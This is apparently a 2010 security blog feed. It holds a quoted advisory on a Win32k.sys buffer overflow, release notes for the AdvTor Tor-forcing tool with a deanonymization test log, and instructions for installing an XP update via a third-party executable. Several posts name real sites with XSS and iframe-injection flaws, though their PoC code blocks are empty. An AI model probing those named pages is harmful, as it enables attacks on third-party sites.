nemesis.te-home.net

Patch for CreateDIBPalette in Win32k.sys for Windows 2000 and XP (all Service Packs)

Mon, 9 Aug 2010 18:47:34 GMT

Secunia wrote:

Secunia Advisory SA40870
Get alerted and manage the vulnerability life cycle
Free Trial

Release Date 2010-08-06

Popularity 5,905 views
Comments 2 comments

Criticality level Less critical
Impact Privilege escalation
Where Local system
Authentication level Available in Customer Area

Report reliability Available in Customer Area
Solution Status Unpatched

Systems affected Available in Customer Area
Approve distribution Available in Customer Area

Operating System Microsoft Windows 7
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2008
Microsoft Windows Storage Server 2003
Microsoft Windows Vista
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional

Secunia CVSS Score Available in Customer Area
CVE Reference(s) No CVE references.

Description
Arkon has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to gain escalated privileges.

The vulnerability is caused due to a boundary error in win32k.sys within the "CreateDIBPalette()" function when copying colour values into a buffer allocated with a fixed size when creating the DIB palette. This can be exploited via the "GetClipboardData()" API to cause a buffer overflow by specifying a large number of colours (greater than 256) via the "biClrUsed" field in a BITMAPINFOHEADER structure.

Successful exploitation may allow execution of arbitrary code with kernel privileges.

The vulnerability is confirmed in fully patched versions of Windows XP SP3, Windows Server 2003 R2 Enterprise SP2, Windows Vista Business SP1, Windows 7, and Windows Server 2008 SP2.

Source: Microsoft Windows win32k.sys Driver "CreateDIBPalette()" Buffer Overflow

I can confirm that all Service Packs of Windows 2000 are also vulnerable. The following patch is for Win32k.sys and it converts biClrUsed from Word to Byte.

Download:

2KXP_win32ksys_Patch_20100809.zip

This program is a proof of concept and is provided "as is". Any express or implied warranties are disclaimed. In no event shall the author be liable for any damages caused arising in any way out of the use of this software, even if advised of the possibility of such damage.

AdvTor 0.1.0.3

Tue, 10 Aug 2010 18:16:34 GMT

New release of AdvTor - version 0.1.0.3.

Changes:

corrected: if Auto-Refresh was disabled, initialization progress was no longer shown
corrected: if Auto-Refresh was disabled, all log messages were shown as popup MessageBox'es
corrected: ASLR detection problems in Windows 2003 (thanks to RoLex for helping with tests)
corrected: the nickname was reset to local computer name if server options were changed (thanks to The Architect for reporting this error)
AdvTor can now force programs that use asynchronous sockets to use Tor
AdvTor also intercepts process creation functions, to set proxy restrictions on child processes created by a restricted process
if AdvTor.exe is renamed, AdvTor.dll must also be renamed

Download:

AdvTor0.1.0.3.zip Nemesis / Sourceforge
AdvTor0.1.0.3src.zip Nemesis / Sourceforge

Testing http://deanonymizer.com under 64-bit version of Windows 7:

AdvTor.exe wrote:

[20:16:57] [proxy] Connection request for deanonymizer.com:80 .
[20:16:58] [proxy] Connection request for deanonymizer.com:80 .
[20:16:58] [proxy] Connection request for deanonymizer.com:80 .
[20:16:58] [proxy] Connection request for deanonymizer.com:80 .
[20:16:58] [proxy] Connection request for deanonymizer.com:80 .
[20:17:04] [proxy] Connection request for deanonymizer.com:80 .
[20:17:05] [proxy] Connection request for deanonymizer.com:80 .
[20:17:10] [proxy] Connection request for deanonymizer.com:80 .
[20:17:11] [proxy] Connection request for deanonymizer.com:80 .
[20:17:12] [proxy] Connection request for deanonymizer.com:80 .
[20:17:13] [proxy] Connection request for deanonymizer.com:80 .
[20:17:13] [proxy] Connection request for deanonymizer.com:80 .
[20:17:14] [proxy] Restricted process iexplore.exe created a new process with PID 2008 : "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /OCX /NoLibraryAdd /Play "http://deanonymizer.com/cgi-bin/payload.cgi?step=1&uid=9525139796792197" /prefetch:10
[20:17:14] [proxy] Setting proxy restrictions for process with PID 2008 (wmplayer.exe)
[20:17:14] [proxy] wmplayer.exe [WMNetMgr.dll]: Attempt to bypass proxy settings with address 66.109.20.52:554 .
[20:17:14] [proxy] Connection request for 66.109.20.52:554 .
[20:17:14] [proxy] wmplayer.exe [WMNetMgr.dll]: Attempt to bypass proxy settings with address 66.109.20.52:554 .
[20:17:14] [proxy] Connection request for 66.109.20.52:554 .
[20:17:15] [proxy] Connection request for 66.109.20.52:80 .
[20:17:16] [proxy] Connection request for 66.109.20.52:80 .
[20:17:22] [proxy] Connection request for deanonymizer.com:80 .
[20:17:34] [proxy] Connection request for deanonymizer.com:80 .
[20:17:34] [proxy] Connection request for deanonymizer.com:80 .
[20:17:36] [proxy] Restricted process iexplore.exe created a new process with PID 2716 : "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /OCX /NoLibraryAdd /Play "http://deanonymizer.com/cgi-bin/payload.cgi?step=2&uid=9525139796792197" /prefetch:10
[20:17:36] [proxy] Setting proxy restrictions for process with PID 2716 (wmplayer.exe)
[20:17:44] [proxy] Connection request for deanonymizer.com:80 .
[20:17:47] [proxy] Connection request for deanonymizer.com:80 .
[20:17:47] [proxy] Connection request for deanonymizer.com:80 .
[20:17:48] [proxy] Restricted process iexplore.exe created a new process with PID 912 : "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /OCX /NoLibraryAdd /Play "http://deanonymizer.com/cgi-bin/payload.cgi?step=3&uid=9525139796792197" /prefetch:10
[20:17:48] [proxy] Setting proxy restrictions for process with PID 912 (wmplayer.exe)
[20:17:56] [proxy] Connection request for deanonymizer.com:80 .
[20:17:59] [proxy] Connection request for deanonymizer.com:80 .
[20:17:59] [proxy] Connection request for deanonymizer.com:80 .
[20:18:02] [proxy] Connection request for deanonymizer.com:80 .
[20:18:06] [proxy] Connection request for deanonymizer.com:80 .
[20:18:09] [proxy] Connection request for deanonymizer.com:80 .
[20:18:10] [proxy] Connection request for deanonymizer.com:80 .
[20:18:11] [proxy] Connection request for deanonymizer.com:80 .
[20:18:11] [proxy] Connection request for deanonymizer.com:80 .
[20:18:19] [proxy] Connection request for deanonymizer.com:80 .
[20:18:23] [proxy] Connection request for deanonymizer.com:80 .
[20:18:26] [proxy] Connection request for deanonymizer.com:80 .
[20:18:28] [proxy] Connection request for deanonymizer.com:80 .
[20:18:28] [proxy] Connection request for deanonymizer.com:80 .
[20:18:28] [proxy] Connection request for deanonymizer.com:80 .
[20:18:40] [proxy] Connection request for deanonymizer.com:80 .
[20:18:42] [proxy] Connection request for deanonymizer.com:80 .
[20:18:42] [proxy] Connection request for deanonymizer.com:80 .
[20:18:52] [proxy] Connection request for deanonymizer.com:80 .
[20:18:54] [proxy] Connection request for deanonymizer.com:80 .
[20:18:54] [proxy] Connection request for deanonymizer.com:80 .
[20:19:05] [proxy] Connection request for deanonymizer.com:80 .
[20:19:06] [proxy] Connection request for deanonymizer.com:80 .
[20:19:06] [proxy] Connection request for deanonymizer.com:80 .
[20:19:17] [proxy] Connection request for deanonymizer.com:80 .
[20:19:20] [proxy] Connection request for deanonymizer.com:80 .
[20:19:20] [proxy] Connection request for deanonymizer.com:80 .
[20:19:32] [proxy] Connection request for deanonymizer.com:80 .
[20:19:35] [proxy] Connection request for deanonymizer.com:80 .
[20:19:35] [proxy] Connection request for deanonymizer.com:80 .
[20:19:49] [proxy] Connection request for deanonymizer.com:80 .
[20:19:53] [proxy] Connection request for deanonymizer.com:80 .
[20:19:53] [proxy] Connection request for deanonymizer.com:80 .
[20:20:05] [proxy] Connection request for deanonymizer.com:80 .
[20:20:09] [proxy] Connection request for deanonymizer.com:80 .
[20:20:09] [proxy] Connection request for deanonymizer.com:80 .
[20:20:13] [proxy] Connection request for www.apple.com:80 .
[20:20:20] [proxy] Connection request for qtinstall.apple.com:80 .
[20:20:25] [proxy] Connection request for appldnld.apple.com.edgesuite.net:80 .
[20:20:34] [proxy] Connection request for 66.109.20.52:80 .
[20:20:37] [proxy] Connection request for 66.109.20.52:80 .
[20:20:45] [proxy] Connection request for deanonymizer.com:80 .
[20:20:56] [proxy] Connection request for deanonymizer.com:80 .
[20:20:56] [proxy] Connection request for deanonymizer.com:80 .
[20:21:00] [proxy] Connection request for www.apple.com:80 .
[20:21:11] [proxy] Connection request for qtinstall.apple.com:80 .
[20:21:19] [proxy] Connection request for appldnld.apple.com.edgesuite.net:80 .
[20:21:26] [warn] Your application (using socks4 to port 21) is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. Consider using Socks4A (e.g. via privoxy or socat) instead. For more information, please see http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#SOCKSAndDNS.
[20:21:26] [proxy] Connection request for 66.109.20.52:21 .
[20:21:28] [warn] Your application (using socks4 to port 21) is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. Consider using Socks4A (e.g. via privoxy or socat) instead. For more information, please see http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#SOCKSAndDNS.
[20:21:28] [proxy] Connection request for 66.109.20.52:21 .
[20:21:29] [warn] Your application (using socks4 to port 21) is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. Consider using Socks4A (e.g. via privoxy or socat) instead. For more information, please see http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#SOCKSAndDNS.
[20:21:29] [proxy] Connection request for 66.109.20.52:21 .
[20:21:36] [proxy] Connection request for deanonymizer.com:80 .
[20:21:37] [proxy] Connection request for deanonymizer.com:80 .
[20:21:37] [proxy] Connection request for deanonymizer.com:80 .
[20:21:38] [proxy] Connection request for www.apple.com:80 .
[20:21:39] [proxy] Connection request for qtinstall.apple.com:80 .
[20:21:40] [proxy] Connection request for appldnld.apple.com.edgesuite.net:80 .
[20:21:50] [proxy] Connection request for deanonymizer.com:80 .
[20:21:52] [proxy] Connection request for deanonymizer.com:80 .
[20:21:58] [proxy] Connection request for deanonymizer.com:80 .
[20:22:04] [proxy] Connection request for deanonymizer.com:80 .
[20:22:04] [proxy] Connection request for deanonymizer.com:80 .
[20:22:04] [proxy] Connection request for xerobank.com:80 .
[20:22:04] [proxy] Connection request for maps.google.com:80 .
[20:22:06] [warn] Your application (using socks4 to port 443) is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. Consider using Socks4A (e.g. via privoxy or socat) instead. For more information, please see http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#SOCKSAndDNS.
[20:22:06] [proxy] Connection request for 88.198.80.243:443 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:07] [proxy] Connection request for deanonymizer.com:80 .
[20:22:09] [proxy] Connection request for deanonymizer.com:80 .
[20:22:10] [proxy] Connection request for deanonymizer.com:80 .
[20:22:10] [proxy] Connection request for deanonymizer.com:80 .
[20:22:10] [proxy] Connection request for deanonymizer.com:80 .

AVG.pl - XSS & IFrame Injection

Fri, 13 Aug 2010 08:19:41 GMT

Vulnerable page - http://www.avg.pl/rejestracja.html

PoC:

XSS -

Code:

IFrame Injection -

Code:

']['€AM€LiT€

Kaspersky.pl, F-Secure.com.pl - XSS & IFrame Injection

Fri, 13 Aug 2010 09:21:19 GMT

Vulnerable page at kaspersky.pl - http://www.kaspersky.pl/oem.html

PoC:

Vulnerable page at f-secure.com.pl - http://f-secure.com.pl/order.html?action=confirm

PoC:

XSS -

Code:

IFrame Injection -

Code:

']['€AM€LiT€

Installing KB980436 Security Update for SChannel.dll on Windows XP (All Service Packs)

Sat, 14 Aug 2010 12:47:41 GMT

microsoft.com wrote:

A security issue has been identified that could allow an unauthenticated remote attacker to compromise your system and gain control over it. You can help protect your system by installing this update from Microsoft. After you install this update, you may have to restart your system.

If you have an older and no longer supported OS, you can still install some security updates, including the updates for shell32.dll and for SChannel.dll on any Service Pack of Windows XP. Not all updates can be installed this way, because some of them may expect some functionality your OS doesn't have. Installing updates on wrong OS may cause undesired effects and system instability.

Installing KB980436 on Windows XP:

Download the installer from http://www.microsoft.com/downloads/details.aspx?familyid=FF00381C-E74B-48E5-9DD9-34DBEDD906A2&displaylang=en
Download KB-install.zip from http://nemesis.te-home.net/Files/KB-install.zip
Extract KB-install.zip to the same directory where the security update is located.
Execute KB-install.exe
Reboot your computer

AdvTor 0.1.0.4

Sat, 21 Aug 2010 14:28:16 GMT

AdvTor 0.1.0.4 can find a process by selecting a window it created. When a window is selected, AdvTor will show a tree with all processes that have same executable name as the process that created the window and all child processes created by them.

Usually, most people who change proxy settings in their browsers want to check their new IP. One of the most visited websites by people who want to check their IP is http://www.whatismyip.com . Unfortunately, most Tor exit nodes are banned there.

Can a website be DoS'ed with a request every 5 minutes ? A website hosted on a dial-up connection can handle more. To bypass this ban, first we enable tracking for ".whatismyip.com" address.

We search for an exit node that is not banned.

To make sure that every time you visit www.whatismyip.com the node that is not banned is used as exit node, select the option to remember exit for www.whatismyip.com .

Changes:

GeoIP information is included as a pre-compiled search tree, GeoIP lookup functions are written in asm; also, a conversion program is included to convert a downloaded GeoIPCountryWhois.csv to geoip_c.h (csv2asm)
AdvTor now also intercepts CreateProcessAsUser from advapi32.dll
context menu from debug window has more options related to selected text if an address is found in it: track exit for selected_host (config option: TrackHostExits), remember/forget exit for selected_host (config option: AddressMap)
debug messages shown by AdvTor.dll have different severity levels
current exit node is shown in title bar
added a DialogBox for selecting a specific exit node or a country from which a random exit node will be chosen (accessible from "New identity" or from systray menu option "Advanced")
added a "Process Finder" DialogBox to help selecting a process by selecting a window it created
system tray menu has a list with 30 usable exit nodes
AdvTor verifies the minimum required version of AdvTor.dll (version 0.1.0.4 requires AdvTor.dll 0.1.0.4)

Download:

AdvTor0.1.0.4.zip (Nemesis / Sourceforge)
AdvTor0.1.0.4src.zip (Nemesis / Sourceforge)

Collection of XSS vulnerable websites

Fri, 27 Aug 2010 13:59:12 GMT

']['�AM�LiT�

AdvTor 0.1.0.5

Sun, 29 Aug 2010 13:20:40 GMT

New release of Advanced TOR: version 0.1.0.5.

Changes:

corrected: if LoadLibrary failed in target process, it was still shown as intercepted
corrected: when unloading the AdvTor.dll, UnloadDLL did not wait for PipeThread to finish
corrected: high CPU usage if no running exit nodes were found (thanks to RoLex for reporting this problem)
corrected: system tray menus were not closed when the user clicked outside them
corrected: AdvTor.dll did not always close handles of remote threads
corrected: AdvTor.dll did not always free the memory it allocated in other processes
corrected: AdvTor.dll did not intercept process creation functions if the option to fake local time was disabled
corrected: intercepted processes that were not updated in GUI were not released when AdvTor exited
corrected: intercepting functions in suspended processes sometimes failed
corrected: AdvTor.dll could re-hook same procedure twice if a previous instance was terminated from task manager
corrected: AdvTor.exe will no longer attempt to intercept itself if the user selects it from process list (thanks to RoLex for reporting this error)
if no running exit nodes can be found for selected country, the notification message is shown only once, until a good exit node is found (thanks to RoLex for reporting this problem)
the confusing message "attempt to bypass proxy settings" is replaced with "redirecting connection from address" (thanks to Meka][Meka for reporting this problem)
system tray menu has a new submenu "Release" with all intercepted processes to allow unloading AdvTor.dll from them
AdvTor.dll now shows more information about interception failures
AdvTor.dll no longer loads user32.dll in intercepted processes
AdvTor.dll also intercepts functions gethostbyname, WSAAsyncGetHostByName, gethostbyaddr, WSAAsyncGetHostByAddr (Windows 2000+), getnameinfo, GetNameInfoW, getaddrinfo, GetAddrInfoW (Windows XP SP2+) (thanks to RoLex for helping with tests)
programs that are intercepted by AdvTor will have all DNS queries and reverse DNS queries resolved by OR network
programs that are intercepted can access .onion addresses, AdvTor.dll will resolve them to an IP within range 127.16.* (localhost) and will keep a cache with geneated IPs and corresponding .onion addresses to use in connection requests
process tree also shows PID values when selecting a window
when AdvTor.dll sends a notification about an intercepted process that doesn't respect proxy settings, it also shows the PID for that process (requested by RoLex)
the lists with exit nodes will also have an entry "no exit", for those who want only to see where an intercepted program would connect, but without allowing it to connect or to send anything
added verification for "localhost" so an intercepted process won't try to use OR network to resolve it (Opera resolves "localhost" every time you save a file)
added verification for "wpad" to prevent vulnerable applications from using OR network to resolve it (Chrome, IE, Yahoo Messenger, etc.)

Download:

AdvTor0.1.0.5.zip - Nemesis / Sourceforge
AdvTor0.1.0.5src.zip - Nemesis / Sourceforge

Version 0.1.0.5 of Advanced TOR can intercept all DNS / reverse DNS queries and redirect them to OR network. If an application doesn't always use its configured proxy settings, a warning message is shown in Debug window and its connection attempts and DNS queries are redirected. Those familiar with Tor know that Tor can work with addresses that can not be resolved by normal name servers. Addresses of hidden services (*.onion) are valid only in OR network but they are connect-only and they don't resolve to an IP. In this particular case, when a program calls a resolve function for an .onion address, AdvTor will return a fake IP in range 127.16.* and it will keep a cache with fake IPs + corresponding .onion addresses that will be used when a program wants to connect to one of these addresses.
As an example, let's see how we can use telnet to connect to the hidden wiki. First, we start a command prompt and use the "Force TOR" option to intercept its process creation functions and Winsock calls.

To use telnet to connect to the hidden wiki, we can use the following command:

Code:

telnet kpvz7ki2v5agwt35.onion 80

When the connection is established, a good HTTP request with telnet:

Code:

GET /wiki/index.php/Main_Page HTTP/1.0
Accept: */*
Accept-Language: en-us
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: kpvz7ki2v5agwt35.onion
Connection: Keep-Alive

avsoft.pl - XSS & IFrame Injection

Wed, 1 Sep 2010 18:09:07 GMT

Vulnerable page - http://www.avsoft.pl/pl/order.html?action=confirm

PoC:

Code:

XSS BY TEAM ELITE

and

Code:

']['€AM€LiT€

Kaspersky eStore Powered by Softkey.ru XSS Vulnerability

Thu, 2 Sep 2010 12:40:40 GMT

Vulnerable page: http://kaspersky.softkey.ru/basket/

PoC:

Code:

"

http://nemesis.te-home.net/

Note: This is a proof of concept and it doesn't reflect the views or interests of all above websites.

']['�AM�LiT�